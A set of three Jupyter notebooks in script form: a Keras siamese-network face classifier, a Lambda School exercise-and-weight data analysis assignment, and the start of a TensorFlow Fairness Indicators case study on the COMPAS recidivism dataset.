from keras.optimizers import SGD,Adam
from keras.losses import binary_crossentropy
import numpy.random as rng
import numpy as np
import os
import pickle
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.utils import shuffle
# %matplotlib inline
def W_init(shape,name=None):
"""Initialize weights as in paper"""
values = rng.normal(loc=0,scale=1e-2,size=shape)
return K.variable(values,name=name)
#//TODO: figure out how to initialize layer biases in keras.
def b_init(shape,name=None):
"""Initialize bias as in paper"""
values=rng.normal(loc=0.5,scale=1e-2,size=shape)
return K.variable(values,name=name)
input_shape = (100, 150, 1)
left_input = Input(input_shape)
right_input = Input(input_shape)
#build convnet to use in each siamese 'leg'
convnet = Sequential()
convnet.add(Conv2D(32,(3,3),activation='relu',input_shape=input_shape,
kernel_initializer=W_init,kernel_regularizer=l2(2e-4)))
convnet.add(MaxPooling2D())
#convnet.add(Conv2D(64,(3,3),activation='relu',
# kernel_regularizer=l2(2e-4),kernel_initializer=W_init,bias_initializer=b_init))
#convnet.add(MaxPooling2D())
#convnet.add(Conv2D(128,(3,3),activation='relu',kernel_initializer=W_init,kernel_regularizer=l2(2e-4),bias_initializer=b_init))
#convnet.add(MaxPooling2D())
#convnet.add(Conv2D(256,(3,3),activation='relu',kernel_initializer=W_init,kernel_regularizer=l2(2e-4),bias_initializer=b_init))
convnet.add(Flatten())
#convnet.add(Dense(1024,activation="sigmoid",kernel_regularizer=l2(1e-3),kernel_initializer=W_init,bias_initializer=b_init))
#convnet.add(Dropout(0.2))
convnet.add(Dense(10,activation="sigmoid",kernel_regularizer=l2(1e-3),kernel_initializer=W_init,bias_initializer=b_init))
convnet.add(Dropout(0.2))
#call the convnet Sequential model on each of the input tensors so params will be shared
encoded_l = convnet(left_input)
encoded_r = convnet(right_input)
#layer to merge two encoded inputs with the l1 distance between them
L2_layer = Lambda(lambda tensors:K.abs((tensors[0] - tensors[1])*(tensors[0] - tensors[1]))) #
#call this layer on list of two input tensors.
L2_distance = L2_layer([encoded_l, encoded_r])
prediction = Dense(1,activation='sigmoid',bias_initializer=b_init)(L2_distance)
siamese_net = Model(inputs=[left_input,right_input],outputs=prediction)
optimizer = Adam(0.00001)
#//TODO: get layerwise learning rates and momentum annealing scheme described in paper working
siamese_net.compile(loss="binary_crossentropy",optimizer=optimizer, metrics=['binary_accuracy'])
siamese_net.count_params()
# + id="rJ_IlII7mwdS" colab_type="code" outputId="a18e1f53-e29b-439d-b2c8-4ea1cf9c1160" colab={"base_uri": "https://localhost:8080/", "height": 363}
siamese_net.summary()
# + id="WBoihD1WnK0r" colab_type="code" colab={}
x1 = np.zeros((100,105,105,1), dtype = 'float32')
x2 = np.zeros((100,105,105,1), dtype = 'float32')
x3 = [x1, x2]
x3 = np.array(x3)
y = np.zeros((100,), dtype = 'float32')
# + id="k3Q_reNPnb_s" colab_type="code" outputId="0e8596cd-8afd-4c06-9267-505ab5e1a9bc" colab={"base_uri": "https://localhost:8080/", "height": 35}
x3.shape
# + id="hzTta6e0vmwv" colab_type="code" colab={}
# prepare data
import glob
num_class = 4
files = []
for nc in range(num_class):
    path = str(nc) + '/*'
    fimg = []
    for f in glob.glob(path):
        fimg.append(f)
    files.append(fimg)
# + id="taRzHrVIwtit" colab_type="code" outputId="46d87d99-16f9-4251-e894-3b95caa39e3c" colab={"base_uri": "https://localhost:8080/", "height": 55}
print(files)
# + id="tUX0KqJJw_tw" colab_type="code" outputId="416a22d1-11a6-40a7-e6bc-f5bb4c84e469" colab={"base_uri": "https://localhost:8080/", "height": 35}
anchors = [a[0] for a in files]
print(anchors)
# + id="xfnP9O4QxSqQ" colab_type="code" outputId="6d3fe344-4b2f-4397-bd71-6c263059be7f" colab={"base_uri": "https://localhost:8080/", "height": 73}
split_factor = 0.6
split = int(len(files[0])*split_factor)
trains = [a[1:split] for a in files]
tests = [a[split:] for a in files]
print(trains)
print(tests)
# + id="D3MOUzRCzqeM" colab_type="code" outputId="a43b8cd4-fb33-45e9-af4a-345d7332f59b" colab={"base_uri": "https://localhost:8080/", "height": 35}
anchor_imgs = [cv2.resize(cv2.imread(a,0), (100,150)) for a in anchors]  # note: cv2.resize takes dsize as (width, height), so these arrays have shape (150, 100)
print(len(anchor_imgs))
# + id="ltxhEIYA0X24" colab_type="code" outputId="1b372f47-2fcd-4f85-bfdd-c5234f11618b" colab={"base_uri": "https://localhost:8080/", "height": 53}
train_imgs = [[cv2.resize(cv2.imread(a,0), (100,150)) for a in x] for x in trains]
print(len(train_imgs))
print(len(train_imgs[0]))
# + id="qsSkQrPT1UxH" colab_type="code" outputId="a477002f-83ca-46cf-ebe9-5d8287452445" colab={"base_uri": "https://localhost:8080/", "height": 53}
test_imgs = [[cv2.resize(cv2.imread(a,0), (100,150)) for a in x] for x in tests]
print(len(test_imgs))
print(len(test_imgs[0]))
# + id="nAxIbtnF1k9I" colab_type="code" colab={}
# x1, x2, y
# x1 contains the anchor images
# x2 contains the training/test images
# if x1 and x2 contain the images of same class then y = 1
# if x1 and x2 do not contain the images of same class then y = 0
x1 = []
x2 = []
y = []
for a_class in range(num_class):
    # pair a specific anchor image of a specific class with each training image
    for t_class in range(num_class):
        for imgs in train_imgs[t_class]:
            x1.append(np.reshape(anchor_imgs[a_class], (100,150,1)))
            x2.append(np.reshape(imgs, (100,150,1)))
            if a_class == t_class:
                y.append(1)
            else:
                y.append(0)
# + id="rifJdY5O3afC" colab_type="code" outputId="bc8d72a7-4446-465a-e348-d838487ef4b9" colab={"base_uri": "https://localhost:8080/", "height": 108}
print(len(x1))
print(len(x2))
print(len(y))
print(x1[0].shape)
print(x2[0].shape)
# + id="DpZhwGG2YdQV" colab_type="code" outputId="91cf70af-e86e-473d-a382-4efcb93ca9ea" colab={"base_uri": "https://localhost:8080/", "height": 35}
x1 = np.array(x1)
x2 = np.array(x2)
y = np.array(y)
x1.shape
# + id="4V781NZKYr3c" colab_type="code" colab={}
x1 = x1/255.
x2 = x2/255.
print(np.max(x1), np.min(x1))
print(np.max(x2), np.min(x2))
print(np.mean(x1))
print(np.mean(x2))
# + id="jrQUHy9byJ71" colab_type="code" colab={}
import random
z = list(zip(x1,x2,y))
random.shuffle(z)
# + id="MKCNNz3lyRqC" colab_type="code" colab={}
x1 = [a[0] for a in z]
x2 = [a[1] for a in z]
y = [a[2] for a in z]
# + id="u-AwXiFMye8i" colab_type="code" outputId="e22c38b6-cb35-48db-aa8d-8a70dd589f06" colab={"base_uri": "https://localhost:8080/", "height": 35}
x1 = np.array(x1)
x2 = np.array(x2)
y = np.array(y)
x1.shape
# + id="f-U8nvI0ymbr" colab_type="code" outputId="9c1832f7-42a2-4715-f69f-1a1bab72cb8b" colab={"base_uri": "https://localhost:8080/", "height": 35}
y.shape
# + id="1R6UHtJ85_Cw" colab_type="code" colab={}
y_cop = y.copy()  # note: y[:] on a NumPy array returns a view, not a copy
y_cop[y==1.] = 0.
y_cop[y==0.] = 1.
# + id="xMUeiirKXVrb" colab_type="code" colab={}
class_weight = {0: 1.,
                1: 1.}
# + id="RlzbiJN1npRC" colab_type="code" outputId="00178714-c2c7-4026-f46a-94999e3bfab3" colab={"base_uri": "https://localhost:8080/", "height": 1529}
siamese_net.fit([x1, x2], y_cop, epochs=40, batch_size=16, verbose=1, validation_split=0.3,
                class_weight=class_weight, shuffle=True)
# + id="56DukDYnny1h" colab_type="code" colab={}
# x1, x2, y for the test set
# x1 contains the anchor images
# x2 contains the test images
# if x1 and x2 contain images of the same class then y = 1, otherwise y = 0
x1 = []
x2 = []
y = []
for a_class in range(num_class):
    # pair a specific anchor image of a specific class with each test image
    for t_class in range(num_class):
        for imgs in test_imgs[t_class]:
            x1.append(np.reshape(anchor_imgs[a_class], (100,150,1)))
            x2.append(np.reshape(imgs, (100,150,1)))
            if a_class == t_class:
                y.append(1)
            else:
                y.append(0)
| Face_OneShot.ipynb |
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---
# + [markdown] id="Okfr_uhwhS1X" colab_type="text"
# # Lambda School Data Science - Making Data-backed Assertions
#
# This is, for many, the main point of data science - to create and support reasoned arguments based on evidence. It's not a topic to master in a day, but it is worth some focused time thinking about and structuring your approach to it.
# + [markdown] id="lOqaPds9huME" colab_type="text"
# ## Assignment - what's going on here?
#
# Consider the data in `persons.csv` (already prepared for you, in the repo for the week). It has four columns - a unique id, followed by age (in years), weight (in lbs), and exercise time (in minutes/week) of 1200 (hypothetical) people.
#
# Try to figure out which variables are possibly related to each other, and which may be confounding relationships.
#
# Try and isolate the main relationships and then communicate them using crosstabs and graphs. Share any cool graphs that you make with the rest of the class in Slack!
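# As a hedged sketch of the crosstab approach suggested above (column names mirror `persons.csv`, but the data here is synthetic, so the numbers are illustrative only):

```python
import numpy as np
import pandas as pd

# Synthetic stand-in for persons.csv: bin the numeric columns, then cross-tabulate.
rng = np.random.default_rng(42)
demo = pd.DataFrame({
    "age": rng.integers(18, 80, 300),
    "exercise_time": rng.integers(0, 300, 300),
})
demo["age_bin"] = pd.cut(demo["age"], bins=[17, 35, 55, 80], labels=["18-35", "36-55", "56-80"])
demo["ex_bin"] = pd.cut(demo["exercise_time"], bins=[-1, 60, 180, 300], labels=["low", "mid", "high"])
# Row-normalized crosstab: fraction of each age group in each exercise band.
ct = pd.crosstab(demo["age_bin"], demo["ex_bin"], normalize="index")
print(ct.round(2))
```

# With the real DataFrame, the same two `pd.cut` + `pd.crosstab` calls apply directly to its columns.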
# + id="TGUS79cOhPWj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="a3f52b56-5444-423e-8130-39f7837b903d"
# loading the data from github
import pandas as pd
# !wget https://raw.githubusercontent.com/bs2537/DS-Unit-1-Sprint-1-Dealing-With-Data/master/module3-databackedassertions/persons.csv
# + id="bgF_p80SWGMR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="bbe810d0-3db8-43fc-f6d2-8d5229481006"
df = pd.read_csv("https://raw.githubusercontent.com/bs2537/DS-Unit-1-Sprint-1-Dealing-With-Data/master/module3-databackedassertions/persons.csv")  # error_bad_lines was deprecated; pass on_bad_lines='skip' in pandas >= 1.3 if malformed rows appear
df.head()
# + id="67a8-uK8bfJH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="29388498-b811-49ad-b6ee-ea6848c1084a"
# finding null values
df.isna().sum()
# + id="_QBuGalTb_z1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="f986509d-36a5-43e0-ac4d-3863938a0428"
# shape of data
df.shape
# + id="LBdtdpubcDV_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 297} outputId="72c1c6bc-0f24-4305-ab77-a44dd3cfdf8b"
# summary statistics
df.describe()
# + id="Xv6UqYezb5B_" colab_type="code" colab={}
# selecting only age, weight and exercise time and dropping the id column (which carries no information)
df = df[['age', 'weight', 'exercise_time']]
# + id="dNLG-nxBdaUf" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 303} outputId="00ce0863-9320-46ed-83df-cd625a87cc0d"
# plotting using matplotlib and seaborn style
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()  # apply the seaborn plot style
df.plot(x='weight', y='exercise_time')
# There seems to be some inverse correlation between these two variables in the plot, which is understandable:
# people who have more exercise time are expected to have lower weight.
# From the plot, the inverse correlation starts at weights higher than 140 pounds.
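# A quick numeric check complements the plot: Pearson correlation via DataFrame.corr().
# (Sketch on synthetic data; on the real data, df[['weight', 'exercise_time']].corr() works directly.)

```python
import numpy as np
import pandas as pd

# Synthetic weight/exercise data with a built-in inverse relationship.
rng = np.random.default_rng(1)
weight = rng.normal(170, 25, 500)
exercise_time = np.clip(400 - 1.5 * weight + rng.normal(0, 40, 500), 0, None)
demo = pd.DataFrame({"weight": weight, "exercise_time": exercise_time})
corr = demo.corr().loc["weight", "exercise_time"]
print(corr)  # negative for this construction
```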
# + id="0iU25KCve6IH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 303} outputId="9547de91-4895-4ec4-a6c9-6a73cb49a4ab"
# next I want to see if age has any effect on increase in weight
df.plot(x='age', y='weight', color='b')
#There does not seem to be a correlation between these two variables
# + id="0qRMkeLagDyY" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 303} outputId="28a58918-613e-4b01-d51c-d7f8abd76165"
# next I want to see if age has any effect on exercise time (maybe older people do less exercise????)
df.plot(x='age', y='exercise_time', color='g')
# from this plot, it seems that people start doing less exercise above age 57-58
# + [markdown] id="BT9gdS7viJZa" colab_type="text"
# ### Assignment questions
#
# After you've worked on some code, answer the following questions in this text block:
#
# 1. What are the variable types in the data?
# 2. What are the relationships between the variables?
# 3. Which relationships are "real", and which spurious?
#
# + [markdown] id="Jwbf1uPRsHlx" colab_type="text"
# 1. The id variable is a nominal identifier; weight, age and exercise time are numerical.
# 2. The relationships between variables are mentioned under the notes in the code columns above.
# 3. Relationship between weight and exercise time appears real from the plot. There also seems to be a relation between age and exercise time after a certain age as mentioned in the comments. The relationship between age and weight is spurious.
#
# To find the statistical significance of the relationship between these variables and the p-value, I will have to run linear regression, which I will do later today.
#
# + id="1GoaSF4btAYf" colab_type="code" colab={}
# Linear regression between weight and exercise time
import numpy as np
from sklearn.linear_model import LinearRegression
# + id="M06ir06StlRa" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 170} outputId="ffde89be-a00b-4889-db62-47e8f384c6b2"
X = df[['weight']].to_numpy()  # DataFrame.as_matrix() was removed in pandas 1.0
print (X)
# + id="v9xGdqvWwBhP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 170} outputId="ac6d62a2-9a78-412c-c9ad-ce4f29af30ed"
Y = df[['exercise_time']].to_numpy().reshape(-1, 1)
print (Y)
# + id="xX_ORbHywokR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="c512c5d1-b4dc-464d-b68a-cd9b1a851d4d"
model = LinearRegression().fit(X, Y)
r_sq = model.score(X, Y)
print ('Coefficient of determination, R2:', r_sq)
# + [markdown] id="kpBH0pJTzudR" colab_type="text"
# The R2 is not very high, so the relationship is not very strong. To establish statistical significance, we have to find the p-value and the confidence intervals. I will do these later, but will first find the model intercept and model coefficient.
#
# + id="AQkGB_Z90BwP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="16c67d18-a3a6-4927-be75-e176c799dc13"
regr = LinearRegression()
model = regr.fit(X, Y)
print('model intercept', model.intercept_)
print ('model coefficient', model.coef_)
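# The p-value promised above can come straight from scipy.stats.linregress, which returns the
# slope, intercept, r value, p-value, and standard error in one call. (Sketch on synthetic
# data; with the real df, pass df['weight'] and df['exercise_time'].)

```python
import numpy as np
from scipy import stats

# Synthetic stand-in for the weight / exercise_time columns.
rng = np.random.default_rng(0)
weight = rng.normal(170, 25, 200)
exercise_time = 300 - 1.2 * weight + rng.normal(0, 30, 200)

result = stats.linregress(weight, exercise_time)
print(f"slope={result.slope:.3f}  r^2={result.rvalue**2:.3f}  p-value={result.pvalue:.2e}")
```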
# + [markdown] id="_XXg2crAipwP" colab_type="text"
# ## Stretch goals and resources
#
# Following are *optional* things for you to take a look at. Focus on the above assignment first, and make sure to commit and push your changes to GitHub.
#
# - [Spurious Correlations](http://tylervigen.com/spurious-correlations)
# - [NIH on controlling for confounding variables](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4017459/)
#
# Stretch goals:
#
# - Produce your own plot inspired by the Spurious Correlation visualizations (and consider writing a blog post about it - both the content and how you made it)
# - Pick one of the techniques that NIH highlights for confounding variables - we'll be going into many of them later, but see if you can find which Python modules may help (hint - check scikit-learn)
| module3-databackedassertions/Bhav_Sep10_2019_LS_DS_113_Making_Data_backed_Assertions_Assignment.ipynb |
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---
# + [markdown] id="ueCj9KW2QTCP"
# ##### Copyright 2020 The TensorFlow Authors.
# + id="wFk_qMvcQZ8S"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] id="HKYXncPn7mSs"
# # Fairness Indicators Lineage Case Study
# + [markdown] id="d7A099z02DB6"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/responsible_ai/fairness_indicators/tutorials/Fairness_Indicators_Lineage_Case_Study"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/fairness-indicators/blob/master/g3doc/tutorials/Fairness_Indicators_Lineage_Case_Study.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/fairness-indicators/tree/master/g3doc/tutorials/Fairness_Indicators_Lineage_Case_Study.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View on GitHub</a>
# </td>
# <td>
# <a href="https://storage.googleapis.com/tensorflow_docs/fairness-indicators/g3doc/tutorials/Fairness_Indicators_Lineage_Case_Study.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
# </td>
# <td>
# <a href="https://tfhub.dev/google/random-nnlm-en-dim128/1"><img src="https://www.tensorflow.org/images/hub_logo_32px.png" />See TF Hub model</a>
# </td>
# </table>
# + [markdown] id="lOKe4l_TSoKy"
# > Warning: Estimators are deprecated (not recommended for new code). Estimators run `v1.Session`-style code which is more difficult to write correctly, and can behave unexpectedly, especially when combined with TF 2 code. Estimators do fall under our [compatibility guarantees](https://tensorflow.org/guide/versions), but will receive no fixes other than security vulnerabilities. See the [migration guide](https://tensorflow.org/guide/migrate) for details.
#
# <!--
# TODO(b/192933099): update this to use keras instead of estimators.
# -->
# + [markdown] id="oZWUeUxjlMjQ"
# ## COMPAS Dataset
# [COMPAS](https://www.propublica.org/datastore/dataset/compas-recidivism-risk-score-data-and-analysis) (Correctional Offender Management Profiling for Alternative Sanctions) is a public dataset, which contains approximately 18,000 criminal cases from Broward County, Florida between January, 2013 and December, 2014. The data contains information about 11,000 unique defendants, including criminal history demographics, and a risk score intended to represent the defendant’s likelihood of reoffending (recidivism). A machine learning model trained on this data has been used by judges and parole officers to determine whether or not to set bail and whether or not to grant parole.
#
# In 2016, [an article published in ProPublica](https://www.propublica.org/article/machine-bias-risk-assessments-in-criminal-sentencing) found that the COMPAS model was incorrectly predicting that African-American defendants would recidivate at much higher rates than their white counterparts. For Caucasian defendants, the model made mistakes in the opposite direction, making incorrect predictions that they wouldn't commit another crime. The authors went on to show that these biases were likely due to an uneven distribution in the data between African-American and Caucasian defendants. Specifically, the proportions of ground-truth negative examples (a defendant **would not** commit another crime) and positive examples (a defendant **would** commit another crime) were disproportionate between the two races. Since 2016, the COMPAS dataset has appeared frequently in the ML fairness literature <sup>1, 2, 3</sup>, with researchers using it to demonstrate techniques for identifying and remediating fairness concerns. This [tutorial from the FAT* 2018 conference](https://youtu.be/hEThGT-_5ho?t=1) illustrates how COMPAS can dramatically impact a defendant’s prospects in the real world.
#
# It is important to note that developing a machine learning model to predict pre-trial detention has a number of important ethical considerations. You can learn more about these issues in the Partnership on AI “[Report on Algorithmic Risk Assessment Tools in the U.S. Criminal Justice System](https://www.partnershiponai.org/report-on-machine-learning-in-risk-assessment-tools-in-the-u-s-criminal-justice-system/).” The Partnership on AI is a multi-stakeholder organization -- of which Google is a member -- that creates guidelines around AI.
#
# We’re using the COMPAS dataset only as an example of how to identify and remediate fairness concerns in data. This dataset is canonical in the algorithmic fairness literature.
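# A quick way to surface the kind of per-group label imbalance described above is a grouped mean of the label column. (Illustrative pandas sketch with made-up numbers, not the real COMPAS distribution.)

```python
import pandas as pd

# Made-up numbers for illustration only.
demo = pd.DataFrame({
    "race": ["African-American"] * 6 + ["Caucasian"] * 6,
    "is_recid": [1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0],
})
# Mean of a 0/1 label per group = fraction of positive (recidivism) examples.
positive_rate = demo.groupby("race")["is_recid"].mean()
print(positive_rate)
```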
#
# ## About the Tools in this Case Study
# * **[TensorFlow Extended (TFX)](https://www.tensorflow.org/tfx)** is a Google-production-scale machine learning platform based on TensorFlow. It provides a configuration framework and shared libraries to integrate common components needed to define, launch, and monitor your machine learning system.
#
# * **[TensorFlow Model Analysis](https://www.tensorflow.org/tfx/tutorials/model_analysis/tfma_basic)** is a library for evaluating machine learning models. Users can evaluate their models on a large amount of data in a distributed manner and view metrics over different slices within a notebook.
#
# * **[Fairness Indicators](https://www.tensorflow.org/tfx/guide/fairness_indicators)** is a suite of tools built on top of TensorFlow Model Analysis that enables regular evaluation of fairness metrics in product pipelines.
#
# * **[ML Metadata](https://www.tensorflow.org/tfx/guide/mlmd)** is a library for recording and retrieving the lineage and metadata of ML artifacts such as models, datasets, and metrics. Within TFX ML Metadata will help us understand the artifacts created in a pipeline, which is a unit of data that is passed between TFX components.
#
# * **[TensorFlow Data Validation](https://www.tensorflow.org/tfx/guide/tfdv)** is a library to analyze your data and check for errors that can affect model training or serving.
#
#
# ## Case Study Overview
#
# For the duration of this case study we will define “fairness concerns” as a bias within a model that negatively impacts a slice within our data. Specifically, we’re trying to limit any recidivism prediction that could be biased towards race.
#
# The walk through of the case study will proceed as follows:
#
# 1. Download the data, preprocess, and explore the initial dataset.
# 2. Build a TFX pipeline with the COMPAS dataset using a Keras binary classifier.
# 3. Run our results through TensorFlow Model Analysis, TensorFlow Data Validation, and load Fairness Indicators to explore any potential fairness concerns within our model.
# 4. Use ML Metadata to track all the artifacts for a model that we trained with TFX.
# 5. Weight the initial COMPAS dataset for our second model to account for the uneven distribution between recidivism and race.
# 6. Review the performance changes within the new dataset.
# 7. Check the underlying changes within our TFX pipeline with ML Metadata to understand what changes were made between the two models.
#
# ## Helpful Resources
# This case study is an extension of the case studies below; it is recommended that you work through them first.
# * [TFX Pipeline Overview](https://github.com/tensorflow/workshops/blob/master/tfx_labs/Lab_1_Pipeline_in_Colab.ipynb)
# * [Fairness Indicator Case Study](https://github.com/tensorflow/fairness-indicators/blob/master/g3doc/tutorials/Fairness_Indicators_Example_Colab.ipynb)
# * [TFX Data Validation](https://github.com/tensorflow/tfx/blob/master/tfx/examples/airflow_workshop/notebooks/step3.ipynb)
#
#
# ## Setup
# To start, we will install the necessary packages, download the data, and import the required modules for the case study.
#
# To install the required packages for this case study in your notebook run the below PIP command.
#
# **Note:** See [here](https://github.com/tensorflow/tfx#compatible-versions) for a reference on compatibility between different versions of the libraries used in this case study.
#
# ___
#
# 1. <NAME>., <NAME>., <NAME>. (2017). Achieving Fairness Through Adversarial Learning: an Application to Recidivism Prediction. https://arxiv.org/abs/1807.00199.
#
# 2. <NAME>., <NAME>., (2017). Fairer and more accurate, but for whom? https://arxiv.org/abs/1707.00046.
#
# 3. <NAME> al., (2017), Fairness in Criminal Justice Risk Assessments: The State of the Art, https://arxiv.org/abs/1703.09207.
#
#
# + cellView="both" id="42BmC-ctlMjR"
# !python -m pip install -q -U \
# tfx \
# tensorflow-model-analysis \
# tensorflow-data-validation \
# tensorflow-metadata \
# tensorflow-transform \
# ml-metadata \
# tfx-bsl
# + id="yeS4Xy2MlMjW"
import os
import tempfile
import six.moves.urllib as urllib
from ml_metadata.metadata_store import metadata_store
from ml_metadata.proto import metadata_store_pb2
import pandas as pd
from google.protobuf import text_format
from sklearn.utils import shuffle
import tensorflow as tf
import tensorflow_data_validation as tfdv
import tensorflow_model_analysis as tfma
from tensorflow_model_analysis.addons.fairness.post_export_metrics import fairness_indicators
from tensorflow_model_analysis.addons.fairness.view import widget_view
import tfx
from tfx.components.evaluator.component import Evaluator
from tfx.components.example_gen.csv_example_gen.component import CsvExampleGen
from tfx.components.schema_gen.component import SchemaGen
from tfx.components.statistics_gen.component import StatisticsGen
from tfx.components.trainer.component import Trainer
from tfx.components.transform.component import Transform
from tfx.orchestration.experimental.interactive.interactive_context import InteractiveContext
from tfx.proto import evaluator_pb2
from tfx.proto import trainer_pb2
# + [markdown] id="YZQLS05WlMjV"
# ## Download and preprocess the dataset
#
# + id="7uOVs7WJlMjl"
# Download the COMPAS dataset and setup the required filepaths.
_DATA_ROOT = tempfile.mkdtemp(prefix='tfx-data')
_DATA_PATH = 'https://storage.googleapis.com/compas_dataset/cox-violent-parsed.csv'
_DATA_FILEPATH = os.path.join(_DATA_ROOT, 'compas-scores-two-years.csv')
data = urllib.request.urlopen(_DATA_PATH)
_COMPAS_DF = pd.read_csv(data)
# To simplify the case study, we will only use the columns that will be used
# for our model.
_COLUMN_NAMES = [
    'age',
    'c_charge_desc',
    'c_charge_degree',
    'c_days_from_compas',
    'is_recid',
    'juv_fel_count',
    'juv_misd_count',
    'juv_other_count',
    'priors_count',
    'r_days_from_arrest',
    'race',
    'sex',
    'vr_charge_desc',
]
_COMPAS_DF = _COMPAS_DF[_COLUMN_NAMES]
# We will use 'is_recid' as our ground truth label, a boolean value indicating
# whether a defendant committed another crime. Some rows contain -1, indicating
# that there is no data; we will drop these rows from training.
_COMPAS_DF = _COMPAS_DF[_COMPAS_DF['is_recid'] != -1]
# Given the distribution between races in this dataset, we will only focus on
# recidivism for African-Americans and Caucasians.
_COMPAS_DF = _COMPAS_DF[
    _COMPAS_DF['race'].isin(['African-American', 'Caucasian'])]
# Add a sample weight feature that will be used during the second part of this
# case study to help address fairness concerns.
_COMPAS_DF['sample_weight'] = 0.8
# Load the DataFrame back to a CSV file for our TFX model.
_COMPAS_DF.to_csv(_DATA_FILEPATH, index=False, na_rep='')
# + [markdown] id="JyCQbe5RlMjn"
# ## Building a TFX Pipeline
#
# ---
# There are several [TFX Pipeline Components](https://www.tensorflow.org/tfx/guide#tfx_pipeline_components) that can be used for a production model, but for the purposes of this case study we will focus on only the components below:
# * **ExampleGen** to read our dataset.
# * **StatisticsGen** to calculate the statistics of our dataset.
# * **SchemaGen** to create a data schema.
# * **Transform** for feature engineering.
# * **Trainer** to run our machine learning model.
#
# ## Create the InteractiveContext
#
# To run TFX within a notebook, we first will need to create an `InteractiveContext` to run the components interactively.
#
# `InteractiveContext` will use a temporary directory with an ephemeral ML Metadata database instance. To use your own pipeline root or database, the optional properties `pipeline_root` and `metadata_connection_config` may be passed to `InteractiveContext`.
# + id="XVMS3Dz7xk8M"
context = InteractiveContext()
# + [markdown] id="NxAOGNCelMjq"
# ### TFX ExampleGen Component
#
# + id="0hzCIDdblMjr"
# The ExampleGen TFX Pipeline component ingests data into TFX pipelines.
# It consumes external files/services to generate Examples which will be read by
# other TFX components. It also provides consistent and configurable
# partitioning, and shuffles the dataset for ML best practice.
example_gen = CsvExampleGen(input_base=_DATA_ROOT)
context.run(example_gen)
# + [markdown] id="SW23fvThlMjz"
# ### TFX StatisticsGen Component
#
# + id="28D_qP3IlMj0"
# The StatisticsGen TFX pipeline component generates features statistics over
# both training and serving data, which can be used by other pipeline
# components. StatisticsGen uses Beam to scale to large datasets.
statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
context.run(statistics_gen)
# + [markdown] id="a72E7hT5lMj9"
# ### TFX SchemaGen Component
# + id="dkfTgKCBlMj9"
# Some TFX components use a description of your input data called a schema. The
# schema is an instance of schema.proto. It can specify data types for feature
# values, whether a feature has to be present in all examples, allowed value
# ranges, and other properties. A SchemaGen pipeline component will
# automatically generate a schema by inferring types, categories, and ranges
# from the training data.
infer_schema = SchemaGen(statistics=statistics_gen.outputs['statistics'])
context.run(infer_schema)
# + [markdown] id="43z_COkolMkI"
# ### TFX Transform Component
#
# The `Transform` component performs data transformations and feature engineering. The results include an input TensorFlow graph which is used during both training and serving to preprocess the data before training or inference. This graph becomes part of the SavedModel that is the result of model training. Since the same input graph is used for both training and serving, the preprocessing will always be the same, and only needs to be written once.
#
# The Transform component requires more code than many other components because of the arbitrary complexity of the feature engineering that you may need for the data and/or model that you're working with.
#
# Define some constants and functions for both the `Transform` component and the `Trainer` component. Define them in a Python module, in this case saved to disk using the `%%writefile` magic command since you are working in a notebook.
#
# The transformation that we will be performing in this case study are as follows:
# * For string values we will generate a vocabulary that maps to an integer via tft.compute_and_apply_vocabulary.
# * For integer values we will standardize the column to mean 0 and variance 1 via tft.scale_to_z_score.
# * Remove empty row values and replace them with an empty string or 0 depending on the feature type.
# * Append ‘_xf’ to column names to denote the features that were processed in the Transform Component.
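# As a plain NumPy illustration of the z-score standardization that `tft.scale_to_z_score` performs per feature (illustrative only, not the tft implementation):

```python
import numpy as np

x = np.array([18.0, 25.0, 40.0, 62.0, 75.0])
z = (x - x.mean()) / x.std()  # mean 0, variance 1 after scaling
print(z.mean(), z.std())
```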
#
#
# Now let's define a module containing the `preprocessing_fn()` function that we will pass to the `Transform` component:
# + id="83MZZqUQlMkJ"
# Setup paths for the Transform Component.
_transform_module_file = 'compas_transform.py'
# + id="NLzxWiOBlMkL"
# %%writefile {_transform_module_file}
import tensorflow as tf
import tensorflow_transform as tft
CATEGORICAL_FEATURE_KEYS = [
    'sex',
    'race',
    'c_charge_desc',
    'c_charge_degree',
]
INT_FEATURE_KEYS = [
    'age',
    'c_days_from_compas',
    'juv_fel_count',
    'juv_misd_count',
    'juv_other_count',
    'priors_count',
    'sample_weight',
]
